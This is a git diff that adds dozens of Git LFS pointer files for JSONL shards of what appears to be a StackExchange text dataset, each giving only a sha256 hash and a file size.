a/data/stackexchange/1-1/1847_2289.jsonl b/data/stackexchange/1-1/1847_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..865c4940b13f1c3c39ce66182daca7b197d87a78 --- /dev/null +++ b/data/stackexchange/1-1/1847_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b290e97db66beea9c37b3fbb3054535e0090b6227325480bab860cb6078a27da +size 34578436 diff --git a/data/stackexchange/1-1/1848_2289.jsonl b/data/stackexchange/1-1/1848_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46bdb5d17a3afe9e03569961a835617b8ece03f1 --- /dev/null +++ b/data/stackexchange/1-1/1848_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ed8006c5511a27df0c7c38c4989825b9fc606fa05e4a14ea45e5227759995c5 +size 34009962 diff --git a/data/stackexchange/1-1/1849_2289.jsonl b/data/stackexchange/1-1/1849_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..009c061ff030d3c895eaca34ce61528b1cb443c0 --- /dev/null +++ b/data/stackexchange/1-1/1849_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3efac11176b0276dc24826543007c3575df3a062a68f1160be08a1e5b22ce5e9 +size 34826432 diff --git a/data/stackexchange/1-1/184_2289.jsonl b/data/stackexchange/1-1/184_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9dde663d9c914a7a053dcb89675bcda01acefa92 --- /dev/null +++ b/data/stackexchange/1-1/184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba94c98878932fb033516a0673443d2dbb0c0cddd2c239fe05b1cc734bae53b0 +size 34726482 diff --git a/data/stackexchange/1-1/1850_2289.jsonl b/data/stackexchange/1-1/1850_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63f9610c52c0132aafe0cb7007060fd0d9a30a91 --- /dev/null +++ b/data/stackexchange/1-1/1850_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5971f8f92bef1fbda4b9bf08bba3fbba511a885bf77e99d8bdef1d23ccea01ff +size 33951758 diff --git a/data/stackexchange/1-1/1851_2289.jsonl b/data/stackexchange/1-1/1851_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a721388152a3dedc7769831de3ba60595a6d0017 --- /dev/null +++ b/data/stackexchange/1-1/1851_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0c17bc2a8ad5a02ddf2ada5251e6a041edad4e928376e6ab8c60badfce9baff +size 34814813 diff --git a/data/stackexchange/1-1/1852_2289.jsonl b/data/stackexchange/1-1/1852_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..709b535716a7f0e9a41bca335c461e40ea73fb22 --- /dev/null +++ b/data/stackexchange/1-1/1852_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f59efb7e9493c4f044d0469b9a90848cde956dfad52287eb0df2e1b7c357ca82 +size 34444761 diff --git a/data/stackexchange/1-1/1853_2289.jsonl b/data/stackexchange/1-1/1853_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f82275ed02cb3a7d9a5fe16d60a2aa40ede0c900 --- /dev/null +++ b/data/stackexchange/1-1/1853_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2813663942d4efca4b549edda919a963e525914ae99d03d1ad69cdb527f5570 +size 34695995 diff --git a/data/stackexchange/1-1/1854_2289.jsonl b/data/stackexchange/1-1/1854_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5743785a4d40ffada72c8b3d1d9fe940c55fcb61 --- /dev/null +++ b/data/stackexchange/1-1/1854_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b4dd807348ebf7408a0e33ad50593de6a5f0bd56c5f48c90548e670a88e0ebc +size 34232978 diff --git a/data/stackexchange/1-1/1855_2289.jsonl b/data/stackexchange/1-1/1855_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93f3077a4905f985dbda27da1198e136524ff6b0 --- /dev/null +++ b/data/stackexchange/1-1/1855_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41d7f2e3ea69befc3eeafce2d4cddb389d1b122705e31b967d232e5011074c81 +size 34736725 diff --git a/data/stackexchange/1-1/1856_2289.jsonl b/data/stackexchange/1-1/1856_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a9ad3a6ecefaeaa31aab7a5fb3521492f3a9792 --- /dev/null +++ b/data/stackexchange/1-1/1856_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:983d5dbff3dbc370f6ffaac80d2a523d9c2906bae4c03bb82c1c69fc260bda0a +size 35001447 diff --git a/data/stackexchange/1-1/1857_2289.jsonl b/data/stackexchange/1-1/1857_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1795f62050b32e8670eccbcc416044f7305e39ca --- /dev/null +++ b/data/stackexchange/1-1/1857_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b8dc0ec02d0a2a36a5ffa89c6c530044ebe9e2f895cb83db00d45b5e85b8ea92 +size 34361813 diff --git a/data/stackexchange/1-1/1858_2289.jsonl b/data/stackexchange/1-1/1858_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a47b9f3fa2805dbe559c27433c08529c5aed59e --- /dev/null +++ b/data/stackexchange/1-1/1858_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba3a5785893857d64089c924264300d077ecd07d777caa5ae940bbac30bbc9f +size 34296577 diff --git a/data/stackexchange/1-1/1859_2289.jsonl b/data/stackexchange/1-1/1859_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70bcff7d81b97e24736f75551ed90c275016eb9a --- /dev/null +++ b/data/stackexchange/1-1/1859_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5072f8ad9a54a1973b05aca1c7e766a1204567a6ebcbe54475aa9bfd0629beee +size 34973290 diff --git a/data/stackexchange/1-1/185_2289.jsonl b/data/stackexchange/1-1/185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0be2914c2fdb5855de80d30915b4fe77bcad64a --- /dev/null +++ b/data/stackexchange/1-1/185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fe90ab48a02c4f0699d88adddf6cde9a54c09d41b8bf73659ab1c075582a0f3 +size 34493657 diff --git a/data/stackexchange/1-1/1860_2289.jsonl b/data/stackexchange/1-1/1860_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89635ad7e6f11da36d78d8991025bfbfc100122e --- /dev/null +++ b/data/stackexchange/1-1/1860_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17800c772f3bda9b0746d935656402ff3d456000ac213e9794506c09409757fa +size 34267505 diff --git a/data/stackexchange/1-1/1861_2289.jsonl b/data/stackexchange/1-1/1861_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c9fe0238c765bceb11c248be3833028edf03964 --- /dev/null +++ b/data/stackexchange/1-1/1861_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:035bb29c499c340b8766fbd5c4bac2f2e32256e418ddcd13c853ee9cc446fa12 +size 33989150 diff --git a/data/stackexchange/1-1/1862_2289.jsonl b/data/stackexchange/1-1/1862_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca21d73639dc8fd65caf8df68db4a7d15b426cf5 --- /dev/null +++ b/data/stackexchange/1-1/1862_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b158b12d3c9017bf405de08bb8ae17a6edca2ec3213924871ae051703eaee35 +size 34192568 diff --git a/data/stackexchange/1-1/1863_2289.jsonl b/data/stackexchange/1-1/1863_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d658eb21b67f861d16e12ae36a6eead2aa42978b --- /dev/null +++ b/data/stackexchange/1-1/1863_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0826b24f0885fbbc53815ba59f05f41ddfdf1aa827485565cdba2671f5b9edc +size 33909793 diff --git a/data/stackexchange/1-1/1864_2289.jsonl b/data/stackexchange/1-1/1864_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2a8ccf393e6498569b3d15446b1741f089bf343 --- /dev/null +++ b/data/stackexchange/1-1/1864_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab8ebdffe44750ac53ac2889780066455d78a535460dc54d1d3e7a7a48b949e2 +size 34968247 diff --git a/data/stackexchange/1-1/1865_2289.jsonl b/data/stackexchange/1-1/1865_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f7acd308e60b27af99887ed6416230b5f56a534d --- /dev/null +++ b/data/stackexchange/1-1/1865_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e09227e5f2df4ecf01f8c5aab38510159ec3b6c5ca5e042a706adf54cbd98db +size 34363895 diff --git a/data/stackexchange/1-1/1866_2289.jsonl b/data/stackexchange/1-1/1866_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b92a7b425dbd5d880a33a810ad6eecd769cc0284 --- /dev/null +++ b/data/stackexchange/1-1/1866_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2116fbaaee6e2ba09d31b4a867eccf396521d4e265028bee14b531204f86986 +size 34327319 diff --git a/data/stackexchange/1-1/1867_2289.jsonl b/data/stackexchange/1-1/1867_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..564889952cc7c4001b6130d6a32f5b902dcb9e7d --- /dev/null +++ b/data/stackexchange/1-1/1867_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4aee9ef9154e6b64823a2d31df08bbc2cf82706cc83946d54f4ead6201460c61 +size 35030147 diff --git a/data/stackexchange/1-1/1868_2289.jsonl b/data/stackexchange/1-1/1868_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..544b12cafe55f884963f13495d8cee72479f0d52 --- /dev/null +++ b/data/stackexchange/1-1/1868_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0348bfa8a50c97e27054eb73f63b8a2c4e2780d08cf83e00b12e59288d46c5d3 +size 34004914 diff --git a/data/stackexchange/1-1/1869_2289.jsonl b/data/stackexchange/1-1/1869_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a1f91dee906e00be720e61d4eb815e93272e9f8 --- /dev/null +++ b/data/stackexchange/1-1/1869_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7255733b7257422bf59e8384fad3a81976c0346b33e9b7b43ac609d5565e2f66 +size 34775566 diff --git a/data/stackexchange/1-1/186_2289.jsonl b/data/stackexchange/1-1/186_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..403cfed166d0142e6077d46e0719b51ceb7263ca --- /dev/null +++ b/data/stackexchange/1-1/186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e8f56d4aa03fab691d16f02664b6c33969aaa0a77fbc2fd2abf9ea7025663cf +size 35157119 diff --git a/data/stackexchange/1-1/1870_2289.jsonl b/data/stackexchange/1-1/1870_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19e138ff94b5a6f5436b99201fc8273490ef5b74 --- /dev/null +++ b/data/stackexchange/1-1/1870_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21dd8083a6ddfc75b53aee856bf6bfce7928d358529140af93fd2fcf20ebc2dc +size 33927813 diff --git a/data/stackexchange/1-1/1871_2289.jsonl b/data/stackexchange/1-1/1871_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0104efca9ec9e585f225ffc0fdbad12ac6f49f29 --- /dev/null +++ b/data/stackexchange/1-1/1871_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:774dc8dad4b5f09820b66b8b57b4ea2f365697a3c8df798787a989057b812037 +size 34687479 diff --git a/data/stackexchange/1-1/1872_2289.jsonl b/data/stackexchange/1-1/1872_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69b865bc6df5d8a9971df6bc0d0c08e43c5159f3 --- /dev/null +++ b/data/stackexchange/1-1/1872_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:09cb850f5ed9dcc334cbca1f0a86095da519658c2000fd35e54113dc685e12d6 +size 34778575 diff --git a/data/stackexchange/1-1/1873_2289.jsonl b/data/stackexchange/1-1/1873_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..55c31708728b00c99d2018248b4b73b519b84e61 --- /dev/null +++ b/data/stackexchange/1-1/1873_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d378b6265942130687c16239d469e91de419f50c1a817957305a9484cb41d546 +size 34797947 diff --git a/data/stackexchange/1-1/1874_2289.jsonl b/data/stackexchange/1-1/1874_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9608f5cb4bab7dc8972b24cc54d86d4ed2351af7 --- /dev/null +++ b/data/stackexchange/1-1/1874_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f48603526e259021d28138e2443243cab36ffecc9f395930e9df1692036ba64e +size 33468179 diff --git a/data/stackexchange/1-1/1875_2289.jsonl b/data/stackexchange/1-1/1875_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25f42ca6eceaeb4c2d9747205374ae6df4c0b657 --- /dev/null +++ b/data/stackexchange/1-1/1875_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a66a9beeaf097a280d679f651207913372c0fabd597cd2104a2c762804058f0 +size 34297365 diff --git a/data/stackexchange/1-1/1876_2289.jsonl b/data/stackexchange/1-1/1876_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5adb27a037f2ddb3fc4e22c9a9e00f05b3e056e --- /dev/null +++ b/data/stackexchange/1-1/1876_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c3dc2da988456b77f2cc5d56ba7a12dc986ce88246d4f59b7fb7e42d71fa1ed +size 34649351 diff --git a/data/stackexchange/1-1/1877_2289.jsonl b/data/stackexchange/1-1/1877_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60eaf6b6ee36e3d1ef16f143741042734acceafb --- /dev/null +++ b/data/stackexchange/1-1/1877_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa9f651395ccf10c0898ef6e765d5c43f96270543eb82a51e283e28355633904 +size 33744689 diff --git a/data/stackexchange/1-1/1878_2289.jsonl b/data/stackexchange/1-1/1878_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42ee1bec15b7b295a00e3ad2ccb54cc2490ac7a7 --- /dev/null +++ b/data/stackexchange/1-1/1878_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a37f656a86cd7415ebe7bc266826b4c886b8aa1927bce740d48c448ea916b82 +size 34477157 diff --git a/data/stackexchange/1-1/1879_2289.jsonl b/data/stackexchange/1-1/1879_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4a7353ede5c0175ad870891a79713bc0d1d4938 --- /dev/null +++ b/data/stackexchange/1-1/1879_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13956bd62d394ee208cfe3d471871234536d50ebfec9f2a2c93bf604fa5d2680 +size 34419089 diff --git a/data/stackexchange/1-1/187_2289.jsonl b/data/stackexchange/1-1/187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0327805b37b6d25b7e891aaa5a8e311e1d71fa29 --- /dev/null +++ b/data/stackexchange/1-1/187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26bbd2678085e436f283ee85b8087595f7d1f89be4c53cf2966d3fabccbc34ac +size 35201178 diff --git a/data/stackexchange/1-1/1880_2289.jsonl b/data/stackexchange/1-1/1880_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..571668c6382b8c660ec4cd17515687187bd91ee0 --- /dev/null +++ b/data/stackexchange/1-1/1880_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b114c54a3c1b2d0b329e8d308606b7f85f28cce2b9765b3613d905d4366e2bd +size 34270622 diff --git a/data/stackexchange/1-1/1881_2289.jsonl b/data/stackexchange/1-1/1881_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..028a0a461acd1f9563ec068ee6342ab39918dc86 --- /dev/null +++ b/data/stackexchange/1-1/1881_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e96336aa586f97b14a74b119c225802e85f7b2c40146167d0a6c96c23b7032e3 +size 34283148 diff --git a/data/stackexchange/1-1/1882_2289.jsonl b/data/stackexchange/1-1/1882_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95479509e55ca35b7d42432b63403f566267cb33 --- /dev/null +++ b/data/stackexchange/1-1/1882_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d1cfd5eebe4a5a98b5192cec432f3c14c401269d36ba77c01970dd7a938e7e0 +size 34883453 diff --git a/data/stackexchange/1-1/1883_2289.jsonl b/data/stackexchange/1-1/1883_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2669d740a5811cfb9f4813bc482906f8d757a47f --- /dev/null +++ b/data/stackexchange/1-1/1883_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fab9251ba7bf10ed9ae69898efa343d135ee2530e7d1d3e5177c2aec80d2bfc +size 34556064 diff --git a/data/stackexchange/1-1/1884_2289.jsonl b/data/stackexchange/1-1/1884_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7584bf181adaaab4a1f56a5729af341b4384a72d --- /dev/null +++ b/data/stackexchange/1-1/1884_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb5f9a0d10ead3efd464d33ebfa2f1719fe88866c6eba7e3f6ff687dd07fcc25 +size 34453503 diff --git a/data/stackexchange/1-1/1885_2289.jsonl b/data/stackexchange/1-1/1885_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21eab3e2a4ecda74bdf4eb6ebf53b331fbfec2df --- /dev/null +++ b/data/stackexchange/1-1/1885_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c965e2c8159a657e2e54dd87d31a2b165424aac16d101ddac06aefdd7649516 +size 34531948 diff --git a/data/stackexchange/1-1/1886_2289.jsonl b/data/stackexchange/1-1/1886_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b32f217e6b76d68d421228d8f3008abf4ca89d8 --- /dev/null +++ b/data/stackexchange/1-1/1886_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09461b0a1b5633cc831377bdc8d7d42552cdb60eb30dcbaa2fdfc3d6a09916d0 +size 34696917 diff --git a/data/stackexchange/1-1/1887_2289.jsonl b/data/stackexchange/1-1/1887_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fa303890a52d751dc6a61edd6bce75e0cc10602 --- /dev/null +++ b/data/stackexchange/1-1/1887_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b30bbde66050a64c2099113210c6e27f9b2da069fd6ac0ea1b42f197a154a4b9 +size 34424158 diff --git a/data/stackexchange/1-1/1888_2289.jsonl b/data/stackexchange/1-1/1888_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aeef6ffa3020c4c9ce8c615ece277fcb6fd500f3 --- /dev/null +++ b/data/stackexchange/1-1/1888_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:d4910e3ee7ca65f10e563bf3cddf0c05d316eb6a7fc089e8bf19ccfc3dbcad90 +size 34332814 diff --git a/data/stackexchange/1-1/1889_2289.jsonl b/data/stackexchange/1-1/1889_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4559e22ca2d86d1adf75f8a1f0faeed4ef8826a --- /dev/null +++ b/data/stackexchange/1-1/1889_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0c1d40d9135502152040bee04e96b7b680523910d1e45574af799fa3ebea9e05 +size 35498493 diff --git a/data/stackexchange/1-1/188_2289.jsonl b/data/stackexchange/1-1/188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9340b8779cd657bd5956d99d9cb38537b87f2f46 --- /dev/null +++ b/data/stackexchange/1-1/188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:022089d983147d06b09b52cf1bd300f7279ffb953be990699022b4659ceee9ee +size 34804107 diff --git a/data/stackexchange/1-1/1890_2289.jsonl b/data/stackexchange/1-1/1890_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd204f9c8ad740761a3ad78f1159d4b3b1dc5fcc --- /dev/null +++ b/data/stackexchange/1-1/1890_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58f82dd3bbfc6b374fc628384c2d8cc3b84d778563de651f948f30f05901a77c +size 35505395 diff --git a/data/stackexchange/1-1/1891_2289.jsonl b/data/stackexchange/1-1/1891_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..231c62736fb86b8865a8732fa6f8cd30a0758895 --- /dev/null +++ b/data/stackexchange/1-1/1891_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1eb0bbe1e60635fb01b42a16b589cdeb2b8cbb58b6c6cf70a14189de4b0028d3 +size 35899236 diff --git a/data/stackexchange/1-1/1892_2289.jsonl b/data/stackexchange/1-1/1892_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..06954e81eec3193efa6fd93d33c45bab4bbd6807 --- /dev/null +++ b/data/stackexchange/1-1/1892_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a3da750aae0dc5228efcaf14be8fee6a3fa448c710b3fa1df6b035221e73b52 +size 36053845 diff --git a/data/stackexchange/1-1/1893_2289.jsonl b/data/stackexchange/1-1/1893_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f71520ec2b272ce4fc9813bdbbcfebc2e488edbc --- /dev/null +++ b/data/stackexchange/1-1/1893_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1ea8ef1e34f8e5bacafb157758f42978d027b272671aab28292249ddc888111 +size 35761013 diff --git a/data/stackexchange/1-1/1894_2289.jsonl b/data/stackexchange/1-1/1894_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fabf1689358278759f6e64facc5a3d36028a4fcf --- /dev/null +++ b/data/stackexchange/1-1/1894_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8b226f7ac10774a6755fafc7b933bd0189002d6bf70675e2bcb8a8045ae8320 +size 35636929 diff --git a/data/stackexchange/1-1/1895_2289.jsonl b/data/stackexchange/1-1/1895_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aabbf1e5ce795f4b7062a884137306119eb93df9 --- /dev/null +++ b/data/stackexchange/1-1/1895_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a3ebf100403a58b7cf8f75619d7d062b338b4fdb1526416598b990895af1875 +size 36227894 diff --git a/data/stackexchange/1-1/1896_2289.jsonl b/data/stackexchange/1-1/1896_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..06cb972a17b2199e174931048a674b430e7c6bbe --- /dev/null +++ b/data/stackexchange/1-1/1896_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8ac3d227bca35c4032741e221bf48a35ff8047902028f6f9e33f5eb41ec8394 +size 35861480 diff --git a/data/stackexchange/1-1/1897_2289.jsonl b/data/stackexchange/1-1/1897_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b87eb4177c8edbff887e23d652fd966bdc4240f --- /dev/null +++ b/data/stackexchange/1-1/1897_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01277c4a98b95ee43f2f3c45f351521f0540e307e14d9a80ffbb5c415f63bd00 +size 35827937 diff --git a/data/stackexchange/1-1/1898_2289.jsonl b/data/stackexchange/1-1/1898_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc141f962ea648cea54d49db40849357d0a548ee --- /dev/null +++ b/data/stackexchange/1-1/1898_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f355b7eb635c5d6913e52231c908a1e2ec027090a6bddce8fcf6cf68cc52d9ef +size 35908788 diff --git a/data/stackexchange/1-1/1899_2289.jsonl b/data/stackexchange/1-1/1899_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ce682a0000ee1ac0a8224a23120bc0c8b5300d4 --- /dev/null +++ b/data/stackexchange/1-1/1899_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f46dc936ef66242b87f8bfcadd26714694d12f88f0910a300c9196288dd3946 +size 35874403 diff --git a/data/stackexchange/1-1/189_2289.jsonl b/data/stackexchange/1-1/189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98d8fbf87d4c8ea7c011e005e5d7c3eed2856f2c --- /dev/null +++ b/data/stackexchange/1-1/189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f732f0686cf9e952f0642fbf5fb5c79059e0e3f6ff9bb3dfce2edc04d1ca5a9 +size 35246522 diff --git a/data/stackexchange/1-1/18_2289.jsonl b/data/stackexchange/1-1/18_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13add9b0e44fd8fdf68db2f890e6e596f6ceb1e2 --- /dev/null +++ b/data/stackexchange/1-1/18_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4831d1102719ef353a9cbb54a49dc1fd5c8008bb2b4ff0f87f4fa7a0b45c49a3 +size 36048864 diff --git a/data/stackexchange/1-1/1900_2289.jsonl b/data/stackexchange/1-1/1900_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8297ab0cfa1c00a1ce4a6388cae636a628a22af --- /dev/null +++ b/data/stackexchange/1-1/1900_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:409a487507b2facf5a47a71969dd84a0cbca32cbe752fb048dc5327a0ca7de9c +size 36002757 diff --git a/data/stackexchange/1-1/1901_2289.jsonl b/data/stackexchange/1-1/1901_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d61b83ed455872244b95cb01ed06ac383e362905 --- /dev/null +++ b/data/stackexchange/1-1/1901_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06f481395f0caae0e72100bf47befe96bad086491642b893b5e019d3cba84778 +size 35692880 diff --git a/data/stackexchange/1-1/1902_2289.jsonl b/data/stackexchange/1-1/1902_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74b2b8a737399cf58bb1f23f440b9a3ee052555e --- /dev/null +++ b/data/stackexchange/1-1/1902_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:45bc19960685f7ce2427d8b57331ee567df0d276552c361de8028bd0dcda4a29 +size 36282786 diff --git a/data/stackexchange/1-1/1903_2289.jsonl b/data/stackexchange/1-1/1903_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b40ea957c2287043338a11a96e4d92cf719a3354 --- /dev/null +++ b/data/stackexchange/1-1/1903_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96a183b9bc9213fc54a3989c9da6ebc3766ef36861f9aa1fbd621af9d1bfde4a +size 35957570 diff --git a/data/stackexchange/1-1/1904_2289.jsonl b/data/stackexchange/1-1/1904_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0d32901913145b9f29087492e779ecbbcc6bc8a --- /dev/null +++ b/data/stackexchange/1-1/1904_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0f77961728fbe34b7afb2c6ebef6890643e4461f1327d0480708305841316ed +size 35804497 diff --git 